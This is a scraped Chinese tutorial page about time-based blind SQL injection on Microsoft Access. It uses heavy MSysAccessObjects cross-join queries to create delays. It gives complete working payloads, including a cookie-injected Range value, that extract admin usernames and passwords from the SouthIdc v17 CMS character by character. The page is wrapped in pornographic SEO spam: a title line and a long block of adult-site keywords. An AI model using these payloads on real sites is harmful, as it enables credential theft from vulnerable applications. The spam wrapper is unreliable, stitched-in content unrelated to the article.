国产午夜成人免费看片无遮挡_日本免费xxxx色视频_免费人成网上在线观看_黄网址在线永久免费观看

當前位置:雨林木風下載站 > 辦公軟件教程 > 詳細頁面

Access數據庫基于時間sql盲注的完成記錄

Access數據庫基于時間sql盲注的完成記錄

更新時間:2022-05-07 文章作者:未知 信息來源:網絡 閱讀次數:

Microsoft Office Access是由微軟發布的關系數據庫管理系統。它結合了 MicrosoftJet Database Engine 和 圖形用戶界面兩項特點,是 Microsoft Office 的系統程序之一。Microsoft Office Access是微軟把數據庫引擎的圖形用戶界面和軟件開發工具結合在一起的一個數據庫管理系統。它是微軟OFFICE的一個成員, 在包括專業版和更高版本的office版本里面被單獨出售。2018年9月25日,最新的微軟Office Access 2019在微軟Office 2019里發布。

   Access是微軟把數據庫引擎的圖形用戶界面和軟件開發工具結合在一起的一個數據庫管理系統。本文我們來看看Access數據庫基于時間sql盲注的實現記錄。

  概述

  眾所周知,access數據庫是不支持基于時間的盲注方式,但是我們可以利用access的系統表MSysAccessObjects,通過多負荷查詢(Heavy Queries)的方式實現。

  初步探究

  我們以SouthIdcv17數據庫為例

  執行 select * from Southidc_About ,返回結果如下圖。

Access數據庫基于時間sql盲注的實現記錄    三聯

  如何實現time base injection 呢?我們就要利用這條語句

  SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12

  具體實現方式如下:

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=97

  我們可以執行一次,觀察效果。

  很明顯,經歷了大約40s才返回結果

Access數據庫基于時間sql盲注的實現記錄

  當我們執行如下語句時,也就是把最后的97改為96

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=96

Access數據庫基于時間sql盲注的實現記錄

  很快就執行完畢,沒有延時。

  很明顯,我們通過where條件后的

  (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

  實現了延時,但需要注意的是這里where后的條件是有順序的,實現延時的語句必須在

  1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

  之前,為什么呢?實驗得出的結論。

  實例實現

  在SouthIdc 17 中,有一處sql注入漏洞,但是常規的方法并不能成功利用漏洞。漏洞代碼如下:

Access數據庫基于時間sql盲注的實現記錄

  雖然程序把Post和Get的數據進行了過濾,但是我們依舊我可以通過Cookie的提交方式進行注入。

  好,我們實現一下注入利用。

  我們需要注入的語句為:

  select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc

  通過提交cookie

  Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image

  ParentID為程序上部傳進的值,最終的語句為:

  1select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1

  我們可以在查詢器中看一下效果

  96時,不延時,如圖:

Access數據庫基于時間sql盲注的實現記錄

  97時延時,效果如下圖:

Access數據庫基于時間sql盲注的實現記錄

  接下來,我們可以利用上述語句進行exp的編寫,筆者這里用python

  核心代碼如下:

Access數據庫基于時間sql盲注的實現記錄

Microsoft Access在很多地方得到廣泛使用,例如小型企業,大公司的部門。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

国产午夜成人免费看片无遮挡_日本免费xxxx色视频_免费人成网上在线观看_黄网址在线永久免费观看

  • <label id="pxtpz"><meter id="pxtpz"></meter></label>
      1. <span id="pxtpz"><optgroup id="pxtpz"></optgroup></span>

        欧美一区二区精品久久911| 欧美羞羞免费网站| 欧美日韩一区二区三区免费看 | 蜜桃视频在线观看一区| 91精品国产综合久久久久久| 久草这里只有精品视频| 国产精品网友自拍| 欧美老女人第四色| 国产一区二区美女| 亚洲精品日韩一| 7777精品久久久大香线蕉| 极品瑜伽女神91| 亚洲精品视频在线观看免费| 欧美一级二级三级蜜桃| 成人一区二区视频| 亚洲午夜一二三区视频| 精品99999| 欧美中文字幕一区二区三区| 久久精品国产99久久6| 亚洲人成人一区二区在线观看| 在线观看91av| av男人天堂一区| 青青草伊人久久| 亚洲日本在线天堂| 亚洲精品一区二区在线观看| 在线观看一区日韩| 国产不卡在线播放| 日韩av中文字幕一区二区| 国产精品高潮久久久久无| 日韩一区二区视频| 欧洲一区二区三区免费视频| 国产传媒日韩欧美成人| 午夜在线成人av| 亚洲图片你懂的| 国产视频亚洲色图| 日韩三级av在线播放| 日本久久精品电影| av资源网一区| 大尺度一区二区| 精品亚洲aⅴ乱码一区二区三区| 亚洲另类色综合网站| 欧美韩日一区二区三区| 精品999在线播放| 亚洲精品在线免费观看视频| 91精品国产色综合久久不卡电影 | 国产精品视频观看| 欧美不卡视频一区| 91精品国产91久久久久久一区二区| 色综合久久中文字幕| 成人网男人的天堂| 成人免费黄色在线| 成人午夜免费视频| 成人午夜激情片| www.亚洲免费av| 99久久精品情趣| 成人福利在线看| kk眼镜猥琐国模调教系列一区二区 | 午夜伦欧美伦电影理论片| 一区二区三区在线视频播放| 伊人夜夜躁av伊人久久| 亚洲人123区| 一区二区高清在线| 日欧美一区二区| 另类小说图片综合网| 韩国欧美一区二区| 粉嫩一区二区三区性色av| 成人免费高清在线观看| 色综合亚洲欧洲| 欧美酷刑日本凌虐凌虐| 欧美一区二区三区视频| 久久这里只有精品视频网| 国产蜜臀97一区二区三区| 国产日产亚洲精品系列| 自拍偷拍亚洲激情| 亚洲狠狠爱一区二区三区| 日韩精品亚洲一区二区三区免费| 免费人成网站在线观看欧美高清| 狠狠色丁香久久婷婷综| 99在线精品视频| 欧美精品在线观看一区二区| 精品久久人人做人人爰| 中文字幕第一区综合| 亚洲高清免费观看| 国内精品久久久久影院色| 成人免费高清在线| 欧美日韩在线直播| 国产欧美在线观看一区| 亚洲五月六月丁香激情| 国产精品99久久不卡二区| 91国产丝袜在线播放| 精品av久久707| 亚洲高清久久久| 国产成都精品91一区二区三| 欧美日韩午夜影院| 欧美国产欧美综合| 五月天一区二区三区| 成人免费不卡视频| 欧美一级一级性生活免费录像| 中文字幕一区二区三区在线观看| 午夜电影网一区| 99久久99久久精品国产片果冻| 欧美一卡二卡在线观看| 一区二区三区资源| 丁香啪啪综合成人亚洲小说| 欧美一级久久久久久久大片| 一区二区在线看| 成人美女视频在线观看| 精品国产精品一区二区夜夜嗨| 亚洲专区一二三| 波多野结衣亚洲| 欧美激情一区三区| 国产一区高清在线| 欧美一级日韩一级| 午夜精品免费在线观看| 欧美性生活大片视频| 亚洲精品欧美激情| 91在线观看污| 国产精品丝袜一区| 丁香网亚洲国际| 国产日本一区二区| 国产盗摄一区二区| 久久精品水蜜桃av综合天堂| 久久精品国产99久久6| 91精品欧美久久久久久动漫| 亚洲国产精品久久久久秋霞影院 | 成人精品高清在线| 亚洲精品在线免费播放| 看电视剧不卡顿的网站| 91精品国产综合久久精品性色| 亚洲成人你懂的| 91成人在线免费观看| 亚洲精品乱码久久久久久黑人| 91一区一区三区| 一区二区三区在线影院| 欧美体内she精高潮| 亚洲成a人v欧美综合天堂| 欧美日韩一区二区三区四区| 天天影视涩香欲综合网| 日韩免费看的电影| 狠狠色丁香婷综合久久| 久久精品一区二区| 99精品国产热久久91蜜凸| 亚洲欧美国产77777| 色婷婷综合五月| 五月开心婷婷久久| 337p粉嫩大胆噜噜噜噜噜91av| 国产精品一区二区久久不卡| 国产精品色哟哟网站| 色妞www精品视频| 午夜精品视频在线观看| 精品国产凹凸成av人网站| 丰满白嫩尤物一区二区| 一区二区三区毛片| 日韩一级高清毛片| 丁香激情综合五月| 亚洲成人免费在线| 久久这里都是精品| 日本精品视频一区二区| 久久99精品国产91久久来源| 国产精品美女一区二区三区| 欧美亚洲禁片免费| 国产成人午夜精品影院观看视频| ...xxx性欧美| 欧美一二三四在线| 99re成人精品视频| 麻豆91在线播放| 亚洲精品美腿丝袜| 精品国精品自拍自在线| 色综合久久中文综合久久97| 爽爽淫人综合网网站| 中文字幕国产精品一区二区| 欧美视频一二三区| 国产精品一区二区久久精品爱涩| 最新热久久免费视频| 日韩欧美高清在线| 99re这里只有精品视频首页| 婷婷国产v国产偷v亚洲高清| 国产网红主播福利一区二区| 欧美体内she精高潮| 亚洲国产精华液网站w| 欧美四级电影网| 成人av网站在线| 狠狠色综合播放一区二区| 亚洲图片欧美视频| 伊人一区二区三区| 国产欧美视频一区二区| 欧美一级高清片| 欧美日韩亚州综合| 91蜜桃在线免费视频| 国产乱子轮精品视频| 亚洲成人一区二区在线观看| 欧美激情一区二区三区不卡| 精品国免费一区二区三区| 欧美日韩免费高清一区色橹橹| 国产成人aaa| 国产另类ts人妖一区二区| 精品在线免费观看| 久久av中文字幕片| 精品一区二区日韩| 久久激五月天综合精品|